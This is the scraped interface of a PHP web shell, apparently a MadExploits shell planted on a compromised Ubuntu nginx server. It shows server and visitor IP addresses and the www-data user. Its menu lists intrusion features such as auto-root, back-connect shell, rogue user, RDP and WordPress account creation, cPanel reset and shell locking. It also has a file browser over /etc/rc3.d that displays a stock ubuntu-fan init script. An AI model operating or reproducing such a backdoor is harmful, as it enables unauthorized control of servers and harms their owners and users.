Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
snap /
core /
17212 /
etc /
rc3.d /
[ HOME SHELL ]
Name
Size
Permission
Action
README
677
B
-rw-r--r--
S01cgmanager
3.48
KB
-rwxr-xr-x
S01rsyslog
2.73
KB
-rwxr-xr-x
S01ubuntu-fan
1.2
KB
-rwxr-xr-x
S02cgproxy
3.28
KB
-rwxr-xr-x
S02cron
2.98
KB
-rwxr-xr-x
S02dbus
2.75
KB
-rwxr-xr-x
S02ssh
3.98
KB
-rwxr-xr-x
S03ondemand
1.54
KB
-rwxr-xr-x
S03rc.local
820
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : S01ubuntu-fan
#!/bin/sh - # # ubuntu-fan Start/Stop Ubuntu FAN Networking # # chkconfig: 345 98 01 # description: Starts/Stops Ubuntu FAN Network Bridge # ### BEGIN INIT INFO # Provides: ubuntu-fan # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Required-Start: $network $remote_fs # Required-Stop: $remote_fs $network # Short-Description: Bring up/down Ubuntu FAN Network Bridge and Overlay # Description: Bring up/down Ubuntu FAN Network Bridge and Overlay ### END INIT INFO # Source function library. . /lib/lsb/init-functions # provide action() fallback if ! type action >/dev/null 2>&1; then # Real basic fallback for sysvinit "action" verbage. action() { echo -n "$1 " shift "$@" && echo "OK" || echo "Failed" } fi start() { action $"Starting Ubuntu FAN network bridge: " /usr/lib/ubuntu-fan/fan-net start } stop() { action $"Stopping Ubuntu FAN network bridge: " /usr/lib/ubuntu-fan/fan-net stop } # See how we were called. case "$1" in start) start ;; stop) stop ;; restart|reload|force-reload) $0 stop $0 start ;; *) echo "Usage: $0 {start|stop|restart|reload|force-reload}" exit 2 ;; esac exit $?
Close